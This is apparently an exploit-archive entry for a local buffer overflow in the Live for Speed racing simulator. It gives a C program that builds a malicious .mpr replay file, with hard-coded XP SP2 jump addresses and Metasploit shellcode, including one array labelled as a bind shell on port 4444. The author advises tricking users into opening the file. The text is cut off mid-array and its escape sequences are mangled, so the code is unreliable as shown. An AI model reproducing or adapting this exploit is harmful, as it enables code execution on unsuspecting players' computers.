[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Live for Speed S1/S2/Demo (.mpr replay file) Buffer Overflow Exploit
# Published : 2007-08-01
# Author : n00b
# Previous Title : Panda Antivirus 2008 Local Privilege Escalation Exploit
# Next Title : IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
/**
*****
**************************************************************************
0day Live for speed patch x s2 /s1 and demo local .mpr buffer over flow
Credit's to n00b for finding bug and writing the exploit
Lfs is a racing simulator with a huge player data-base with 100,000+ user's.
I found a local buffer over flow where im able to execute shell code
on the user's computer,We can save the replay's and import replay file's
into lfs for viewing.So exploitation is pretty simple Trick a user into opening
the .mpr file not very hard trust me.The buffer over flow seam's to be in
the name for the car's.We are then able to do a jmp or call esp into our
shellcode.If you want to See the debug information look at the first poc
released.!!
Compile with dev c++ 4.9.9.2
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
-------------------------------------------------------------------------
MPR file header format for LFS S2 : 0.5X9
=========================================================================
FILE DESCRIPTION :
==================
num unit offset description
--- ---- ------ -----------
6 char 0 LFSMPR : do not read file if no match
1 byte 6 game version : ignore
1 byte 7 game revision : ignore
1 byte 8 MPR version : ignore
1 byte 9 immediate start : joined already running game
1 byte 10 reserved : -
1 byte 11 reserved : -
1 int 12 rules : -
1 int 16 flags : -
1 byte 20 laps byte : laps / hours (see notes)
1 byte 21 skill : skill level (0,1,2,3,4)
1 byte 22 wind : 0=off 1=weak 2=strong
1 byte 23 num players : players at start of race
8 char 24 LFS version : text, ends 0
4 char 32 short track name : e.g. BL2R
1 int 36 start time (UTC) : seconds from 00:00 1/1/1970
32 char 40 track name : text, ends 0
1 byte 72 config : 1,2,3.. (first config is 1)
1 byte 73 reversed : 0=no 1=yes
1 byte 74 weather : 0,1,2.. (first weather is 0)
1 byte 75 num finished (NF) : players in results table
1 int 76 0 : -
=========================================================================
Vendor's web site:www.liveforspeed.net.
Affected version's Live for Speed S2 ALPHA PATCH 0.5X.
Special thank's to str0ke.
****************************************************************
*****
**/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define Credits_to "Credit's to n00b for finding this buffer over flow"
#define Mpr_file "exploit.mpr"
//If none of the jmp esp work for you find your own and define it!!
#define JMP_ESP_English "x0AxAFxD8x77" //user32.dll xp sp2 english
#define CALL_ESP_French "x8bx51x81x7c" //Kernel32.dll xp sp2 french
#define JMP_ESP_German "x47x74xd2x77" //user32.dll xp sp2 german
char file_header1[] =
"x4cx46x53x4dx50x52x00x05x0dx01x30x20x00x08x00x00"
"x23x00x00x00x06x04x00x01x30x2ex35x58x31x30x00x00"
"x46x45x32x00xfexadxadx46x46x65x72x6ex20x42x61x79"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x02x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x46x4fx58x5fx72x69x63x68x6dx6fx6ex64x00x00x00x00"
"x00x00x00x00x48x45x4cx5fx44x45x46x41x55x4cx54";
char file_header2[] =
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x44x04x00x00x00x5ex33x42x75x6ex64x79"
"x72x6fx79x5ex30x99x00x00x00x00x00x00x00x00x00x00"
"x00x5ex33x72x75x6dx70x69x67x01x01x06x02x1ax07x00"
"x00x0cx0dx55x00x00x00x00x00x44x45x46x41x55x4cx54"
"x00x00x00x00x00x00x00x00x00xd4x05x07x00x00x52xd9"
"x8ex66x00xcdxbdx0cx46x4fx52x4dx55x4cx41x20x58x52"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x72x69x63x68x6dx6fx6ex64x00x00"
"x00x00x00x00x00x00xa0xa0xa0x00x0ax0ax0ax00x0ax0a"
"x0ax00x0ax0ax0ax00xa0xa0xa0x00x0ax0ax0ax00x0ax0a"
"x0ax00x0ax0ax0ax00xd1x0ex8dx96xc7x30x28x06x25x55"
"x44xfax8cx08xfex70xfdxb0xfcx70xb6xcax0cx35xcfxde"
"x1ax87xa1x2ex7dx7fxbfx9fxdex9dx8dx66x8ex63x41xbd"
"xa2x44x4cxc0xcbxcbx70x3ax01xa0xd4x61xe7xd5xf9xc0"
"xe8x40x53x59x06x4ax49xc7xa0x81x98x1bxe4xe7x05xa0"
"xdfxe5xf2x9ax57xc0xd0x2fxc1xdcx32x71x44x6bx70x3a"
"x01xa0xd4x61xe7xd5xcbxccxe6xf6xdbx6fxe4xeax4bxe2"
"x8dx54x3bxd5x18x77x43x9cx67x8dx64x7bx22x02x34x02"
"x07xffx1fx00x00x00x00x8axa2x28x00x8axa2xfcx07x00"
"x00x00x00x8axa2x28x00x8axa2xfcx07x00x00x00x00x8a"
"xa2x28x00x8axa2xfcx07x00x00x00x00x8axa2x28x00x8a"
"xa2xfcx07x3cx07x00x01x00x68x6fx73x74x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x3cx07x01x01x00x5ex33x42x75x6ex64x79x72x6fx79x5e"
"x30x99x00x00x00x00x00x00x00x00x00x00x00x5ex33x72"
"x75x6dx70x69x67x62x75x6ex64x79x72x6fx79x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x3cx07x08"
"x00x00x6ex30x30x62x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x6fx6fx6fx6fx6f"
"x48x41x6dx75x68x61x61x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x84x3bx00x00x00x00"
"x00x00x00x00x00xffxffxffxffxffxffx00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48"
"x13x02x06x14x06x00x01x04x04x00x00x00x00x00x00x00"
"x00x00x00x00x14x00x00x00x46x03x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x1ex00x50x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x65x0ex00x00x97x0exfcx00"
"x35x00x34x55x01x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00xcex0exfcx00x0dx00x0cx28x00"
"x27x3cx00x00x00x00x00x00x00x00xe7x0exfcx00x05x00"
"x04x0cx05x00x00x0ax0fxfex01xc5xd9x07x00xebx85x22"
"x00x41x00xc4x00x70xa8xf6xffx99xf0xfcxfex9cx54x00"
"x00xc9x7fxabxf8x85xffx54x07xc8x7fx1cxffx0axd7x23"
"x3cxfcxffxffxffxf5x92x31x41xf0xf7xc1xf6x85x28x00"
"x00x00x00x00x00x00x00x00x00x40x43x4ax48x4dx0fxfc"
"x00x0ex00x04x0dx15x00x00x08x24x00x00x00x34x3fx34"
"x3fx6ax0fxfcx01x15x00x14x2fx68x7bxabx00x00xccxe5"
"x37x9fx00x00x4ex09xe8x21x0cx29x00xe7x70x0fxfcx02"
"x15x00x14x2fx68x7bxabx00x00xccxe5x37x9fx00x00x4e"
"x09xe8x21x0cx29x00xe7x8bx0fxfex01x46xdax07x00xeb"
"x85x22x00x41x00xc4x00x70xa8xf6xffx99xf0xfcxfex9c"
"x54x00x00xc9x7fxabxf8x84xffx54x07xc8x7fx1cxffx0a"
"xd7x23x3cx8cxf0x3fx00x7ex87xd9x40xf4x7dx07x88x85"
"x28x00x00x00x00x00x00x00x00x00x00x40x43x4ax48x09"
"x10xfcx01x35x00x34x02x07xffx1fx00x00x00x00x8axa2"
"x28x00x8axa2xfcx07x00x00x00x00x8axa2x28x00x8axa2"
"xfcx07x00x00x00x00x8axa2x28x00x8axa2xfcx07x00x00"
"x00x00x8axa2x28x00x8axa2xfcx07x0dx10xfex01xc8xda"
"x07x00xebx85x22x00x41x00xc4x00x70xa8xf6xffx99xf0"
"xfcxfex9dx54x00x00xc9x7fxabxf8x84xffx54x07xc8x7f"
"x1cxffx0axd7x23x3cx58xf0x3fx00x9bxd9x1ax41x04xed"
"xbex89x85x28x00x00x00x00x00x00x00x00x00x00x40x43"
"x4ax48x80x10xfcx00x05x00x04x0cx06x00x00x90x10xfe"
"x01x4bxdbx07x00xebx85x22x00x41x00xc4x00x70xa8xf6"
"xffx99xf0xfcxfex9ex54x00x00xc9x7fxabxf8x85xffx54"
"x07xc8x7fx1bxffx0axd7x23x3cx34xf0x3fx00x39x15x29"
"x41x18xf7xbfxc5x85x28x00x00x00x00x00x00x00x00x00"
"x00x40x43x4ax48xb5x10xfdx02x10x00x01x10x00x00x67"
"x6fx6fx64x20x72x61x63x65x00x00x00xf5x10xfdx02x08"
"x00x01x08x00x00x3ax2dx29x00x13x11xfex01xcexdbx07"
"x00xebx85x22x00x41x00xc4x00x70xa8xf6xffx99xf0xfc"
"xfex9fx54x00x00xc9x7fxabxf8x85xffx54x07xc8x7fx1b"
"xffx0axd7x23x3cx04xf0xffxffx69x4dx88x40xa0x16xc9"
"xc2x85x28x00x00x00x00x00x00x00x00x00x00x40x43x4a"
"x48x48x11xfcx01x05x00x04x0dx16x00x00x95x11xfex01"
"x50xdcx07x00xebx85x22x00x41x00xc4x00x70xa8xf6xff"
"x99xf0xfcxfexa0x54x00x00xc9x7fxabxf8x84xffx54x07"
"xc8x7fx1bxffx0axd7x23x3cx20xf0xffxffx63xcexb9x40"
"x1cxc9x07xc7x85x28x00x00x00x00x00x00x00x00x00x00"
"x40x43x4ax48xa2x11xfcx02x05x00x04x0dx17x00x00x17"
"x12xfex01xd2xdcx07x00xebx85x22x00x41x00xc4x00x70"
"xa8xf6xffx99xf0xfcxfexa0x54x00x00xc9x7fxabxf8x84"
"xffx54x07xc8x7fx1axffx0axd7x23x3cx70x00x00x00x55"
"x24xf0x40x3cx3bx40x99x85x28x00x00x00x00x00x00x00"
"x00x00x00x40x43x4ax48x19x12xfcx00x05x00x04x0cx07"
"x00x00x7fx12xfcx00x05x00x04x0dx13x00x00x9ax12xfe"
"x01x55xddx07x00xebx85x22x00x41x00xc4x00x70xa8xf6"
"xffx99xf0xfcxfexa1x54x00x00xc9x7fxabxf8x85xffx54"
"x07xc8x7fx1axffx0axd7x23x3cx48xd0x3fx00x3fx79x1f"
"x41x4cxd3xffx8bx85x28x00x00x00x00x00x00x00x00x00"
"x00x40x43x4ax48x00x00xffx00";
//shellcode from www.metasploit.com execute calc.exe. 351 byte's
char shellcode[]=
"xfcxbbxe6x02xd5x0fxebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffx1ax68x3ex42x0ax94x3f"
"xa2x35x07x4bx31xedxecxc0x8fxd1x67xaax0ax51x79xbc"
"x9exeex61xc9xfexd0x90x26x49x9bxa7x33x4bx75xf6x83"
"xd5x25x7dxc3x92x32xbfx0ex57x3dxfdx64x9cx06x55x5f"
"x75x0dxb0x14xdaxc9x3bxc0x83x9ax30x5dxc7xc3x54x60"
"x3cxf8x48xe9x4bx92xb4xf1x2axa9x84xd2xc9xa6xa4xd4"
"x9axf8x26x9exedxe4x9bx2bx4dx1cxbax43xc0x52x4cx78"
"x8cx95x86xe6x7ex0fx4fxd4xb2xa7xf8x69x81x68x53x71"
"x35xfex90x60x4axc5x76x84x65x66xfex9fxecx19xedx68"
"xf3x4cx84x6ax0cxbex30xb2xfbxcbx6cx13x03xe5x3cxcf"
"xa8x5ax90xacx1dx1fx45xccx72xf9x01x23x2fx63x81xca"
"x2exfex4dx69xaax70x49x26x34xa6x3fxd9x9bx13x3fx09"
"x73x3fx12x84x6dx68x92x0fx3exc3x93x60xa9x0ex22x07"
"x63x87x4axd1x24x73xe1x8bx3bxabx9ax5cx23x32x5bxe5"
"xfcx3bxb5x43xfcx13x5cx06x66xf5xc9xb5x0bx70xecx50"
"x84xdbxc6x68xadx3cx72x35x27x20xb2x75xc4x0ex4bx37"
"x06xb0xf6x94xcbxc1x8dxdcx40x72xdax75xe5x7axaex90"
"xf6xf7x95x63xdexacx42xcex8ex03x3cx84x31xf2xefx0d"
"x63x0bxdfxc6x2ex2axe5xd8x62x33x30x8ex7bx34x8axb0"
"x54x41xa2xb2xd6x91x29xb4x0fx4bx4dx9axd8x9bx3bx1f"
"x46x08xc3xf6x87x7ex3bxf7x77x7ex3cxf7x77";
//win32 bind shell on port 4444 http://metasploit.com
char calc_shellcode[]=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
